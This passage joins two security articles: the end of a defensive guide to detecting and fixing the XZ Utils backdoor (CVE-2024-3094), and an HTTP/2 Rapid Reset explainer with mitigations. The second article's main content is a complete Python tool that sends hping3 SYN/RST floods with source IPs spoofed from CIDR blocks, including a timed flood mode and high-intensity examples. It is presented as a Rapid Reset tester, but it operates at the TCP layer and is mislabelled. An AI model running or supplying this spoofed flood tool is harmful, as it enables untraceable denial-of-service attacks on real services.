    # Check the indicator count (the scanner prints "Indicators: N")
    suspicious=$(grep -oE 'Indicators: [0-9]+' "$RESULTS_DIR/${hostname}_${port}.txt" \
                | grep -oE '[0-9]+' | tail -1)
    suspicious=${suspicious:-0}

    if [ "$suspicious" -ge "$ALERT_THRESHOLD" ]; then
        echo "ALERT: $hostname:$port shows $suspicious indicators" \
            | mail -s "CVE-2024-3094 Detection Alert" security@company.com
    fi

    # Rate limiting to avoid overwhelming targets
    sleep 2
done < "$SERVERS_FILE"

# Generate summary report
echo "Scan Summary - $(date)" > "$RESULTS_DIR/summary.txt"
grep -l "VULNERABLE" "$RESULTS_DIR"/*.txt | wc -l \
    >> "$RESULTS_DIR/summary.txt"

Server List Format (production_servers.txt):

web-01.production.company.com
web-02.production.company.com:22
database-master.internal:2222
bastion.external.company.com
10.0.1.50
10.0.1.51:2200

SIEM Integration

For enterprise environments with Security Information and Event Management systems:

#!/bin/bash
# SIEM integration script

SYSLOG_SERVER="siem.company.com"
SYSLOG_PORT=514

scan_and_log() {
    local host=$1
    local port=${2:-22}

    result=$(./ssh_backdoor_scanner.py "$host" -p "$port" 2>&1)

    if echo "$result" | grep -q "VULNERABLE"; then
        severity="CRITICAL"
        priority=2
    elif echo "$result" | grep -q "SUSPICIOUS"; then
        severity="WARNING"
        priority=4
    else
        severity="INFO"
        priority=6
    fi

    # Send to syslog
    logger -n "$SYSLOG_SERVER" -P "$SYSLOG_PORT" \
           -p "local0.$priority" \
           -t "react2shell-scan" \
           "[$severity] CVE-2024-3094 scan: host=$host:$port result=$severity"
}

# Scan from asset inventory (one "host" or "host:port" entry per line)
while IFS=':' read -r host port; do
    scan_and_log "$host" "${port:-22}"
done < asset_inventory.txt

Remediation Steps

Immediate Response for Vulnerable Systems

When a system is identified as potentially compromised:

Step 1: Verify the Finding

# Connect to the system (if possible)
ssh admin@suspicious-server

# Check XZ version
xz --version
# Look for: xz (XZ Utils) 5.6.0 or 5.6.1

# Verify SSH linkage
ldd $(which sshd) | grep liblzma
# If present, check version:
# readlink -f /lib/x86_64-linux-gnu/liblzma.so.5

Step 2: Assess Potential Compromise

# Review authentication logs
grep -E 'Accepted|Failed' /var/log/auth.log | tail -100

# Check for suspicious authentication patterns
# - Successful authentications without corresponding key/password attempts
# - Authentications from unexpected source IPs
# - User accounts that shouldn't have SSH access

# Review active sessions
w
last -20

# Check for unauthorized SSH keys
find /home -name authorized_keys -exec cat {} \;
find /root -name authorized_keys -exec cat {} \;

# Look for unusual processes
ps auxf | less

Step 3: Immediate Containment

If compromise is suspected:

# Isolate the system from network
# Save current state for forensics first
netstat -tupan > /tmp/netstat_snapshot.txt
ps auxf > /tmp/process_snapshot.txt

# Then block incoming SSH
iptables -I INPUT -p tcp --dport 22 -j DROP

# Or shutdown SSH entirely
systemctl stop ssh

Step 4: Remediation

For systems with the vulnerable version but no evidence of compromise:

# Debian/Ubuntu systems
apt-get update
apt-get install --only-upgrade xz-utils

# Verify the new version
xz --version
# Should show 5.4.x or 5.5.x

# Alternative: Explicit downgrade
apt-get install xz-utils=5.4.5-0.3

# Restart SSH to unload old library
systemctl restart ssh

Step 5: Post Remediation Verification

# Verify library version
readlink -f /lib/x86_64-linux-gnu/liblzma.so.5
# Should NOT be 5.6.0 or 5.6.1

# Confirm SSH no longer shows timing anomalies
# Run scanner again from remote system
./ssh_backdoor_scanner.py remediated-server.com

# Monitor for a period
tail -f /var/log/auth.log

System Hardening Post Remediation

After removing the backdoor, implement additional protections:

SSH Configuration Hardening:

Create a secure SSH configuration:

# Edit /etc/ssh/sshd_config

# Disable password authentication
PasswordAuthentication no

# Limit authentication methods
PubkeyAuthentication yes
ChallengeResponseAuthentication no

# Restrict user access
AllowUsers admin deploy monitoring

# Enable additional logging
LogLevel VERBOSE

# Restart SSH
systemctl restart ssh

Monitoring Implementation:

cat > /etc/fail2ban/jail.local << 'EOF'
[sshd]
enabled = true
port = ssh
logpath = /var/log/auth.log
maxretry = 3
bantime = 3600
findtime = 600
EOF

systemctl restart fail2ban

Regular Scanning:

Add automated checking to crontab:

# Create monitoring script
cat > /usr/local/bin/check_xz_backdoor.sh << 'EOF'
#!/bin/bash
/usr/local/bin/ssh_backdoor_scanner.py localhost > /var/log/xz_check.log 2>&1
EOF

chmod +x /usr/local/bin/check_xz_backdoor.sh

# Add to crontab without clobbering existing entries
(crontab -l 2>/dev/null; echo "0 2 * * * /usr/local/bin/check_xz_backdoor.sh") | crontab -

Lessons for the Security Community

Supply Chain Security Imperatives

This attack highlights critical vulnerabilities in the open source ecosystem:

Maintainer Burnout: Many critical projects rely on volunteer maintainers working in isolation. The XZ Utils maintainer was a single individual managing a foundational library with limited resources and support.

Trust But Verify: The security community must develop better mechanisms for verifying not just code contributions, but also the contributors themselves. Multi-year social engineering campaigns can bypass traditional code review.

Automated Analysis: Build systems and binary artifacts must receive the same scrutiny as source code. The XZ backdoor succeeded partly because attention focused on C source files while malicious build scripts and test files went unexamined.

Dependency Awareness: Understanding indirect dependency chains is critical. Few would have identified XZ Utils as SSH-related, yet this unexpected connection enabled the attack.

Detection Strategy Evolution

The fortuitous discovery of this backdoor through performance testing suggests the security community needs new approaches:

Behavioral Baselining: Systems should establish performance baselines for critical services. Deviations, even subtle ones, warrant investigation.

Timing Analysis: Side-channel attacks aren’t just theoretical concerns. Timing differences can reveal malicious code even when traditional signatures fail.

Continuous Monitoring: Point-in-time security assessments miss time-based attacks. Continuous behavioral monitoring can detect anomalies as they emerge.

Cross-Discipline Collaboration: The backdoor was discovered by a database developer doing performance testing, not a security researcher. Encouraging collaboration across disciplines improves security outcomes.

Infrastructure Recommendations

Organizations should implement:

Binary Verification: Don’t just verify source code. Ensure build processes are deterministic and reproducible. Compare binaries across different build environments.

Runtime Monitoring: Deploy tools that can detect unexpected library loading, function hooking, and behavioral anomalies in production systems.

Network Segmentation: Limit the blast radius of compromised systems through proper network segmentation and access controls.

Incident Response Preparedness: Have procedures ready for supply chain compromises, including rapid version rollback and system isolation capabilities.

The Role of Timing in Security

This attack demonstrates the importance of performance analysis in security:

Performance as Security Signal: Unexplained performance degradation should trigger security investigation, not just performance optimization.

Side Channel Awareness: Developers should understand that any observable behavior, including timing, can reveal system state and potential compromise.

Benchmark Everything: Establish performance baselines for critical systems and alert on deviations.

Conclusion

CVE-2024-3094 represents a watershed moment in supply chain security. The sophistication of the attack, spanning years of social engineering and technical preparation, demonstrates that determined adversaries can compromise even well-maintained open source projects.

The backdoor’s discovery was largely fortuitous, happening during unrelated performance testing just before the compromised versions would have reached production systems worldwide. This near-miss should serve as a wake-up call for the entire security community.

The detection tools and methodologies presented in this article provide practical means for identifying compromised systems. However, the broader lesson is that security requires constant vigilance, comprehensive monitoring, and a willingness to investigate subtle anomalies that might otherwise be dismissed as performance issues.

As systems become more complex and supply chains more intricate, the attack surface expands beyond traditional code vulnerabilities to include the entire software development and distribution process. Defending against such attacks requires not just better tools, but fundamental changes in how we approach trust, verification, and monitoring in software systems.

The XZ Utils backdoor was detected and neutralized before widespread exploitation. The next supply chain attack may not be discovered so quickly, or so fortunately. The time to prepare is now.

Additional Resources

Technical References

National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2024-3094

OpenWall Disclosure: https://www.openwall.com/lists/oss-security/2024/03/29/4

Technical Analysis by Sam James: https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27

Detection Tools

The scanner tools discussed in this article are available for download and can be deployed in production environments for ongoing monitoring. They require no authentication to the target systems and work by analyzing observable timing behavior in the SSH handshake and authentication process.

These tools should be integrated into regular security scanning procedures alongside traditional vulnerability scanners and intrusion detection systems.
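
To make the timing-analysis idea concrete, here is a minimal Python sketch, not one of the scanner tools themselves, that measures SSH banner latency over repeated connections as a simplified stand-in for a full authentication probe. The host name is a placeholder, and the 800 ms figure mirrors the indicator listed below:

import socket
import statistics
import time

def ssh_banner_time(host: str, port: int = 22) -> float:
    """Milliseconds from TCP connect to receipt of the SSH version banner."""
    start = time.monotonic()
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(256)  # e.g. b"SSH-2.0-OpenSSH_9.6..."
    return (time.monotonic() - start) * 1000.0

samples = [ssh_banner_time('ssh.example.com') for _ in range(20)]
mean = statistics.mean(samples)
stdev = statistics.stdev(samples)
print(f"mean={mean:.1f}ms stdev={stdev:.1f}ms")

# Heuristic: investigate hosts whose timing exceeds the indicator threshold
# or shows unusually high variance across samples.
if mean > 800 or stdev > mean / 2:
    print("Timing anomaly: investigate this host")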

Indicators of Compromise

XZ Utils version 5.6.0 or 5.6.1 installed

SSH daemon (sshd) linking to liblzma library

Unusual SSH authentication timing (>800ms for auth probe)

High variance in SSH connection establishment times

Recent XZ Utils updates from February or March 2024

Debian or Ubuntu systems with systemd-enabled SSH

OpenSSH versions 9.6 or 9.7 on Debian-based distributions

Recommended Actions

Scan all SSH-accessible systems for timing anomalies

Verify XZ Utils versions across your infrastructure

Review SSH authentication logs for suspicious patterns

Implement continuous monitoring for behavioral anomalies

Establish performance baselines for critical services

Develop incident response procedures for supply chain compromises

Consider additional SSH hardening measures

Review and audit all open source dependencies in your environment


Testing Your Website for HTTP/2 Rapid Reset Vulnerabilities from macOS

Introduction

In August 2023, a critical zero-day vulnerability in the HTTP/2 protocol was disclosed that affected virtually every HTTP/2-capable web server and proxy. Known as HTTP/2 Rapid Reset (CVE-2023-44487), this vulnerability enabled attackers to launch devastating Distributed Denial of Service (DDoS) attacks with minimal resources. Google reported mitigating the largest DDoS attack ever recorded at the time (398 million requests per second) leveraging this technique.

Understanding this vulnerability and knowing how to test your infrastructure against it is crucial for maintaining a secure and resilient web presence. This guide provides a flexible testing tool designed specifically for macOS that uses hping3 for packet crafting, with CIDR-based source IP address spoofing capabilities.

What is HTTP/2 Rapid Reset?

The HTTP/2 Protocol Foundation

HTTP/2 introduced multiplexing, allowing multiple streams (requests/responses) to be sent concurrently over a single TCP connection. Each stream has a unique identifier and can be independently managed. To cancel a stream, HTTP/2 uses the RST_STREAM frame, which immediately terminates the stream and signals that no further processing is needed.

The Vulnerability Mechanism

The HTTP/2 Rapid Reset attack exploits the asymmetry between client cost and server cost:

  • Client cost: Sending a request followed immediately by a RST_STREAM frame is computationally trivial
  • Server cost: Processing the incoming request (parsing headers, routing, backend queries) consumes significant resources before the cancellation is received

An attacker can:

  1. Open an HTTP/2 connection
  2. Send thousands of requests with incrementing stream IDs
  3. Immediately cancel each request with RST_STREAM frames
  4. Repeat this cycle at extremely high rates

The server receives these requests and begins processing them. Even though the cancellation arrives milliseconds later, the server has already invested CPU, memory, and I/O resources. By sending millions of request/cancel pairs per second, attackers can exhaust server resources with minimal bandwidth.
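
For intuition, here is a conceptual sketch of the request-then-cancel pattern using the Python hyper-h2 library (pip install h2). It is an illustration for servers you own, not a load-testing tool, and the host name is a placeholder:

import socket
import ssl

import h2.connection

HOST = 'test.example.com'  # placeholder: a server you are authorized to test

ctx = ssl.create_default_context()
ctx.set_alpn_protocols(['h2'])
sock = ctx.wrap_socket(socket.create_connection((HOST, 443)),
                       server_hostname=HOST)

conn = h2.connection.H2Connection()
conn.initiate_connection()
sock.sendall(conn.data_to_send())

# Each iteration opens a stream and cancels it immediately: trivially cheap
# for the client, while the server may already have started processing.
for stream_id in range(1, 201, 2):  # client-initiated stream IDs are odd
    conn.send_headers(stream_id, [
        (':method', 'GET'), (':path', '/'),
        (':scheme', 'https'), (':authority', HOST),
    ])
    conn.reset_stream(stream_id, error_code=8)  # 8 = CANCEL
    sock.sendall(conn.data_to_send())

sock.close()

Note that the hping3 script later in this article works at the TCP layer (SYN/RST packets) rather than sending real HTTP/2 frames; the sketch above shows what the protocol-level attack itself looks like.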

Why It’s So Effective

Traditional rate limiting and DDoS mitigation techniques struggle against Rapid Reset attacks because:

  • Low bandwidth usage: The attack uses minimal data (mostly HTTP/2 frames with small headers)
  • Valid protocol behavior: RST_STREAM is a legitimate HTTP/2 mechanism
  • Connection reuse: Attackers multiplex thousands of streams over relatively few connections
  • Amplification: Each cheap client operation triggers expensive server-side processing

How to Guard Against HTTP/2 Rapid Reset

1. Update Your Software Stack

Immediate Priority: Ensure all HTTP/2 capable components are patched:

Web Servers:

  • Nginx 1.25.2+ or 1.24.1+
  • Apache HTTP Server 2.4.58+
  • Caddy 2.7.4+
  • LiteSpeed 6.0.12+

Reverse Proxies and Load Balancers:

  • HAProxy 2.8.2+ or 2.6.15+
  • Envoy 1.27.0+
  • Traefik 2.10.5+

CDN and Cloud Services:

  • CloudFlare (auto patched August 2023)
  • AWS ALB/CloudFront (patched)
  • Azure Front Door (patched)
  • Google Cloud Load Balancer (patched)

Application Servers:

  • Tomcat 10.1.13+, 9.0.80+
  • Jetty 12.0.1+, 11.0.16+, 10.0.16+
  • Node.js 20.8.0+, 18.18.0+

2. Implement Stream Limits

Configure strict limits on HTTP/2 stream behavior:

# Nginx configuration
http2_max_concurrent_streams 128;
http2_recv_timeout 10s;

# Apache HTTP Server
H2MaxSessionStreams 100
H2StreamTimeout 10

# HAProxy configuration
defaults
    timeout http-request 10s
    timeout http-keep-alive 10s

frontend https-in
    option http-use-htx
    http-request track-sc0 src
    http-request deny if { sc_http_req_rate(0) gt 100 }

3. Deploy Rate Limiting

Implement multi-layered rate limiting:

Connection level limits:

limit_conn_zone $binary_remote_addr zone=addr:10m;
limit_conn addr 10;  # Max 10 concurrent connections per IP

Request level limits:

limit_req_zone $binary_remote_addr zone=req_limit:10m rate=50r/s;
limit_req zone=req_limit burst=20 nodelay;

Stream cancellation tracking:

# Newer Nginx versions track RST_STREAM rates
http2_max_concurrent_streams 100;
http2_max_field_size 16k;
http2_max_header_size 32k;

4. Infrastructure Level Protections

Use a WAF or DDoS Protection Service:

  • CloudFlare (includes Rapid Reset protection)
  • AWS Shield Advanced
  • Azure DDoS Protection Standard
  • Imperva/Akamai

Enable Connection Draining:

# Gracefully handle connection resets
http2_recv_buffer_size 256k;
keepalive_timeout 60s;
keepalive_requests 100;

5. Monitoring and Alerting

Track critical metrics:

  • HTTP/2 stream reset rates
  • Concurrent stream counts per connection
  • Request cancellation patterns
  • CPU and memory usage spikes
  • Unusual traffic patterns from specific IPs

Example Prometheus query:

rate(nginx_http_requests_total{status="499"}[5m]) > 100

6. Consider Disabling HTTP/2 (Temporary Measure)

If you cannot immediately patch:

# Nginx: Disable HTTP/2 temporarily
listen 443 ssl;  # Remove http2 parameter
# Apache: Disable HTTP/2 module
# a2dismod http2

Note: This reduces performance benefits but eliminates the vulnerability.

Testing Script for HTTP/2 Rapid Reset Vulnerabilities on macOS

Below is a parameterized Python script that tests your web servers using hping3 for packet crafting. The script is optimized for macOS and can spoof source IP addresses from a CIDR block to simulate distributed attacks. hping3 provides consistent packet-crafting behavior across network environments, though spoofed packets may still be filtered upstream (see the notes on BCP 38 later in this article).

Prerequisites for macOS

Installation Steps:

# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install hping3
brew install hping

Note: This script requires root/sudo privileges for packet crafting and IP spoofing.

The Testing Script

cat > http2rapidresettester_macos.py << 'EOF'

#!/usr/bin/env python3
"""
HTTP/2 Rapid Reset Vulnerability Tester for macOS
Tests web servers for susceptibility to CVE-2023-44487
Uses hping3 for packet crafting with source IP spoofing from CIDR block

Usage:
    sudo python3 http2rapidresettester_macos.py --host example.com --port 443 --cidr 192.168.1.0/24 --packets 1000

Requirements:
    brew install hping
"""

import argparse
import subprocess
import random
import ipaddress
import time
import sys
import os
import platform
from typing import List, Optional

class HTTP2RapidResetTester:
    def __init__(
        self,
        host: str,
        port: int = 443,
        cidr_block: Optional[str] = None,
        timeout: int = 30,
        verbose: bool = False,
        interface: Optional[str] = None
    ):
        self.host = host
        self.port = port
        self.cidr_block = cidr_block
        self.timeout = timeout
        self.verbose = verbose
        self.interface = interface
        self.source_ips: List[str] = []

        # Verify running on macOS
        if platform.system() != 'Darwin':
            print("WARNING: This script is optimized for macOS")

        if not self.check_hping3():
            raise RuntimeError("hping3 is not installed. Install with: brew install hping")

        if not self.check_root():
            raise RuntimeError("This script requires root privileges (use sudo)")

        if cidr_block:
            self.generate_source_ips()
            
        if interface:
            self.verify_interface()

    def check_hping3(self) -> bool:
        """Check if hping3 is installed"""
        try:
            result = subprocess.run(
                ['which', 'hping3'],
                capture_output=True,
                text=True,
                timeout=5
            )
            if result.returncode == 0:
                return True

            # Try alternative hping command
            result = subprocess.run(
                ['which', 'hping'],
                capture_output=True,
                text=True,
                timeout=5
            )
            return result.returncode == 0
        except Exception as e:
            print(f"Error checking for hping3: {e}")
            return False

    def check_root(self) -> bool:
        """Check if running with root privileges"""
        return os.geteuid() == 0

    def verify_interface(self):
        """Verify that the specified network interface exists"""
        try:
            result = subprocess.run(
                ['ifconfig', self.interface],
                capture_output=True,
                text=True,
                timeout=5
            )
            if result.returncode != 0:
                raise RuntimeError(f"Network interface '{self.interface}' not found")
            
            if self.verbose:
                print(f"Using network interface: {self.interface}")
                
        except subprocess.TimeoutExpired:
            raise RuntimeError(f"Timeout verifying interface '{self.interface}'")
        except FileNotFoundError:
            raise RuntimeError("ifconfig command not found")

    def generate_source_ips(self):
        """Generate list of IP addresses from CIDR block"""
        try:
            network = ipaddress.ip_network(self.cidr_block, strict=False)
            # Note: this materializes every host address in memory. That is
            # fine for /16 and smaller blocks, but very large blocks (e.g. a
            # /12 with ~1M hosts) consume significant memory; prefer smaller
            # ranges for testing.
            self.source_ips = [str(ip) for ip in network.hosts()]

            if len(self.source_ips) == 0:
                # Handle /32 or /31 networks
                self.source_ips = [str(ip) for ip in network]

            print(f"Generated {len(self.source_ips)} source IPs from {self.cidr_block}")

        except ValueError as e:
            print(f"Invalid CIDR block: {e}")
            sys.exit(1)

    def get_random_source_ip(self) -> Optional[str]:
        """Get a random IP address from the CIDR block"""
        if not self.source_ips:
            return None
        return random.choice(self.source_ips)

    def get_hping_command(self) -> str:
        """Determine which hping command is available"""
        result = subprocess.run(['which', 'hping3'], capture_output=True, text=True)
        if result.returncode == 0:
            return 'hping3'
        return 'hping'

    def craft_syn_packet(self, source_ip: str, count: int = 1) -> bool:
        """
        Craft TCP SYN packet using hping3

        Args:
            source_ip: Source IP address to spoof
            count: Number of packets to send

        Returns:
            True if successful, False otherwise
        """
        try:
            hping_cmd = self.get_hping_command()
            cmd = [
                hping_cmd,
                '-S',  # SYN flag
                '-p', str(self.port),  # Destination port
                '-c', str(count),  # Packet count
                '--fast',  # Send packets as fast as possible
            ]

            if source_ip:
                cmd.extend(['-a', source_ip])  # Spoof source IP

            if self.interface:
                cmd.extend(['-I', self.interface])  # Specify network interface

            cmd.append(self.host)

            if self.verbose:
                print(f"Executing: {' '.join(cmd)}")

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=self.timeout
            )

            return result.returncode == 0

        except subprocess.TimeoutExpired:
            if self.verbose:
                print(f"Timeout executing hping3 for {source_ip}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"Error crafting SYN packet: {e}")
            return False

    def craft_rst_packet(self, source_ip: str, count: int = 1) -> bool:
        """
        Craft TCP RST packet using hping3

        Args:
            source_ip: Source IP address to spoof
            count: Number of packets to send

        Returns:
            True if successful, False otherwise
        """
        try:
            hping_cmd = self.get_hping_command()
            cmd = [
                hping_cmd,
                '-R',  # RST flag
                '-p', str(self.port),  # Destination port
                '-c', str(count),  # Packet count
                '--fast',  # Send packets as fast as possible
            ]

            if source_ip:
                cmd.extend(['-a', source_ip])  # Spoof source IP

            if self.interface:
                cmd.extend(['-I', self.interface])  # Specify network interface

            cmd.append(self.host)

            if self.verbose:
                print(f"Executing: {' '.join(cmd)}")

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=self.timeout
            )

            return result.returncode == 0

        except subprocess.TimeoutExpired:
            if self.verbose:
                print(f"Timeout executing hping3 for {source_ip}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"Error crafting RST packet: {e}")
            return False

    def rapid_reset_test(
        self,
        num_packets: int,
        packets_per_ip: int = 10,
        reset_ratio: float = 1.0,
        delay_between_bursts: float = 0.01
    ) -> dict:
        """
        Perform rapid reset attack simulation

        Args:
            num_packets: Total number of packets to send
            packets_per_ip: Number of packets per source IP before switching
            reset_ratio: Ratio of RST packets to SYN packets (1.0 = equal)
            delay_between_bursts: Delay between packet bursts in seconds

        Returns:
            Dictionary with test results
        """
        results = {
            'total_packets': 0,
            'syn_packets': 0,
            'rst_packets': 0,
            'unique_source_ips': 0,
            'failed_packets': 0,
            'start_time': time.time(),
            'end_time': None
        }

        print(f"\nStarting HTTP/2 Rapid Reset test:")
        print(f"   Total packets: {num_packets}")
        print(f"   Packets per source IP: {packets_per_ip}")
        print(f"   RST to SYN ratio: {reset_ratio}")
        print(f"   Target: {self.host}:{self.port}")
        if self.cidr_block:
            print(f"   Source CIDR: {self.cidr_block}")
            print(f"   Available source IPs: {len(self.source_ips)}")
        if self.interface:
            print(f"   Network interface: {self.interface}")
        print("=" * 60)

        used_ips = set()
        packets_sent = 0
        current_ip_packets = 0
        current_source_ip = self.get_random_source_ip()

        if current_source_ip:
            used_ips.add(current_source_ip)

        try:
            while packets_sent < num_packets:
                # Switch to new source IP if needed
                if current_ip_packets >= packets_per_ip and self.source_ips:
                    current_source_ip = self.get_random_source_ip()
                    used_ips.add(current_source_ip)
                    current_ip_packets = 0

                # Send SYN packet
                if self.craft_syn_packet(current_source_ip, count=1):
                    results['syn_packets'] += 1
                    results['total_packets'] += 1
                    packets_sent += 1
                    current_ip_packets += 1
                else:
                    results['failed_packets'] += 1

                # Send RST packet based on ratio
                if random.random() < reset_ratio:
                    if self.craft_rst_packet(current_source_ip, count=1):
                        results['rst_packets'] += 1
                        results['total_packets'] += 1
                        packets_sent += 1
                        current_ip_packets += 1
                    else:
                        results['failed_packets'] += 1

                # Progress indicator
                if packets_sent % 100 == 0:
                    elapsed = time.time() - results['start_time']
                    rate = packets_sent / elapsed if elapsed > 0 else 0
                    print(f"Progress: {packets_sent}/{num_packets} packets "
                          f"({rate:.0f} pps) | "
                          f"Unique IPs: {len(used_ips)}")

                # Small delay between bursts
                if delay_between_bursts > 0:
                    time.sleep(delay_between_bursts)

        except KeyboardInterrupt:
            print("\nTest interrupted by user")
        except Exception as e:
            print(f"\nTest error: {e}")

        results['end_time'] = time.time()
        results['unique_source_ips'] = len(used_ips)

        return results

    def flood_mode(
        self,
        duration: int = 60,
        packet_rate: int = 1000
    ) -> dict:
        """
        Perform continuous flood attack for specified duration

        Args:
            duration: Duration of the flood in seconds
            packet_rate: Target packet rate per second

        Returns:
            Dictionary with test results
        """
        results = {
            'total_packets': 0,
            'syn_packets': 0,
            'rst_packets': 0,
            'unique_source_ips': 0,
            'failed_packets': 0,
            'start_time': time.time(),
            'end_time': None,
            'duration': duration
        }

        print(f"\nStarting flood mode:")
        print(f"   Duration: {duration} seconds")
        print(f"   Target rate: {packet_rate} packets/second")
        print(f"   Target: {self.host}:{self.port}")
        if self.cidr_block:
            print(f"   Source CIDR: {self.cidr_block}")
        if self.interface:
            print(f"   Network interface: {self.interface}")
        print("=" * 60)

        end_time = time.time() + duration
        used_ips = set()

        try:
            while time.time() < end_time:
                batch_start = time.time()

                # Send batch of packets
                for _ in range(packet_rate // 10):  # Batch in 0.1s intervals
                    source_ip = self.get_random_source_ip()
                    if source_ip:
                        used_ips.add(source_ip)

                    # Send SYN
                    if self.craft_syn_packet(source_ip, count=1):
                        results['syn_packets'] += 1
                        results['total_packets'] += 1
                    else:
                        results['failed_packets'] += 1

                    # Send RST
                    if self.craft_rst_packet(source_ip, count=1):
                        results['rst_packets'] += 1
                        results['total_packets'] += 1
                    else:
                        results['failed_packets'] += 1

                # Rate limiting
                batch_duration = time.time() - batch_start
                sleep_time = 0.1 - batch_duration
                if sleep_time > 0:
                    time.sleep(sleep_time)

                # Progress update
                elapsed = time.time() - results['start_time']
                remaining = end_time - time.time()
                rate = results['total_packets'] / elapsed if elapsed > 0 else 0

                print(f"Elapsed: {elapsed:.1f}s | Remaining: {remaining:.1f}s | "
                      f"Rate: {rate:.0f} pps | Total: {results['total_packets']}")

        except KeyboardInterrupt:
            print("\nFlood interrupted by user")
        except Exception as e:
            print(f"\nFlood error: {e}")

        results['end_time'] = time.time()
        results['unique_source_ips'] = len(used_ips)

        return results

    def display_results(self, results: dict):
        """Display test results in a readable format"""
        duration = results['end_time'] - results['start_time']

        print("\n" + "=" * 60)
        print("TEST RESULTS")
        print("=" * 60)
        print(f"Total packets sent:      {results['total_packets']}")
        print(f"SYN packets:             {results['syn_packets']}")
        print(f"RST packets:             {results['rst_packets']}")
        print(f"Failed packets:          {results['failed_packets']}")
        print(f"Unique source IPs used:  {results['unique_source_ips']}")
        print(f"Test duration:           {duration:.2f}s")

        if duration > 0:
            rate = results['total_packets'] / duration
            print(f"Average packet rate:     {rate:.0f} packets/second")

        print("\n" + "=" * 60)
        print("ASSESSMENT")
        print("=" * 60)

        if results['failed_packets'] > results['total_packets'] * 0.5:
            print("WARNING: High failure rate detected")
            print("  Check network connectivity and firewall rules")
        elif results['total_packets'] > 0:
            print("Test completed successfully")
            print("  Monitor target server for:")
            print("    Connection state table exhaustion")
            print("    CPU/memory utilization spikes")
            print("    Application performance degradation")

        print("=" * 60 + "\n")

def main():
    parser = argparse.ArgumentParser(
        description='Test web servers for HTTP/2 Rapid Reset vulnerability (macOS version)',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Basic test with CIDR block
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

  # Specify network interface
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --interface en0 --packets 1000

  # Flood mode for 60 seconds
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 10.0.0.0/16 --flood --duration 60

  # High intensity test with specific interface
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 172.16.0.0/12 --interface en1 --packets 10000 --packetsperip 50

  # Test without IP spoofing
  sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

Prerequisites:
  1. Install hping3: brew install hping
  2. Run with sudo for raw socket access
  3. Check available interfaces: ifconfig

Note: IP spoofing works reliably with hping3 across different network environments.
        """
    )

    # Connection parameters
    parser.add_argument('--host', required=True, help='Target hostname or IP address')
    parser.add_argument('--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--cidr', help='CIDR block for source IP spoofing (e.g., 192.168.1.0/24)')
    parser.add_argument('--interface', help='Network interface to use (e.g., en0, en1). Optional.')
    parser.add_argument('--timeout', type=int, default=30, help='Command timeout in seconds (default: 30)')

    # Test mode parameters
    parser.add_argument('--flood', action='store_true', help='Enable flood mode (continuous attack)')
    parser.add_argument('--duration', type=int, default=60, help='Duration for flood mode in seconds (default: 60)')
    parser.add_argument('--packetrate', type=int, default=1000, help='Target packet rate for flood mode (default: 1000)')

    # Normal mode parameters
    parser.add_argument('--packets', type=int, default=1000,
                       help='Total number of packets to send (default: 1000)')
    parser.add_argument('--packetsperip', type=int, default=10,
                       help='Number of packets per source IP before switching (default: 10)')
    parser.add_argument('--resetratio', type=float, default=1.0,
                       help='Ratio of RST to SYN packets (default: 1.0)')
    parser.add_argument('--burstdelay', type=float, default=0.01,
                       help='Delay between packet bursts in seconds (default: 0.01)')

    # Other options
    parser.add_argument('--verbose', action='store_true', help='Enable verbose output')

    args = parser.parse_args()

    # Print header
    print("=" * 60)
    print("HTTP/2 Rapid Reset Vulnerability Tester for macOS")
    print("CVE-2023-44487")
    print("Using hping3 for packet crafting")
    print("=" * 60)
    print(f"Target: {args.host}:{args.port}")
    if args.cidr:
        print(f"Source CIDR: {args.cidr}")
    else:
        print("Source IP: Local IP (no spoofing)")
    if args.interface:
        print(f"Interface: {args.interface}")
    print("=" * 60)

    # Create tester instance
    try:
        tester = HTTP2RapidResetTester(
            host=args.host,
            port=args.port,
            cidr_block=args.cidr,
            timeout=args.timeout,
            verbose=args.verbose,
            interface=args.interface
        )
    except RuntimeError as e:
        print(f"ERROR: {e}")
        sys.exit(1)

    try:
        if args.flood:
            # Run flood mode
            results = tester.flood_mode(
                duration=args.duration,
                packet_rate=args.packetrate
            )
        else:
            # Run normal rapid reset test
            results = tester.rapid_reset_test(
                num_packets=args.packets,
                packets_per_ip=args.packetsperip,
                reset_ratio=args.resetratio,
                delay_between_bursts=args.burstdelay
            )

        # Display results
        tester.display_results(results)

    except KeyboardInterrupt:
        print("\nTest interrupted by user")
        sys.exit(0)
    except Exception as e:
        print(f"\nFatal error: {e}")
        import traceback
        if args.verbose:
            traceback.print_exc()
        sys.exit(1)

if __name__ == '__main__':
    main()
EOF
chmod +x http2rapidresettester_macos.py

Using the Testing Script on macOS

Summary of usage:

# Use specific interface
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --interface en0 --packets 1000

# Use WiFi interface (typically en0 on MacBooks)
sudo python3 http2rapidresettester_macos.py --host example.com --interface en0 --packets 500

# Use Ethernet interface
sudo python3 http2rapidresettester_macos.py --host example.com --interface en1 --cidr 10.0.0.0/16 --flood --duration 30

# Without interface (uses default routing)
sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

Test your server with CIDR block spoofing:

sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

Advanced Examples

High intensity test (use cautiously in test environments):

sudo python3 http2rapidresettester_macos.py \
    --host staging.example.com \
    --cidr 10.0.0.0/16 \
    --packets 5000 \
    --packetsperip 50

Flood mode for sustained testing:

sudo python3 http2rapidresettester_macos.py \
    --host test.example.com \
    --cidr 172.16.0.0/12 \
    --flood \
    --duration 60 \
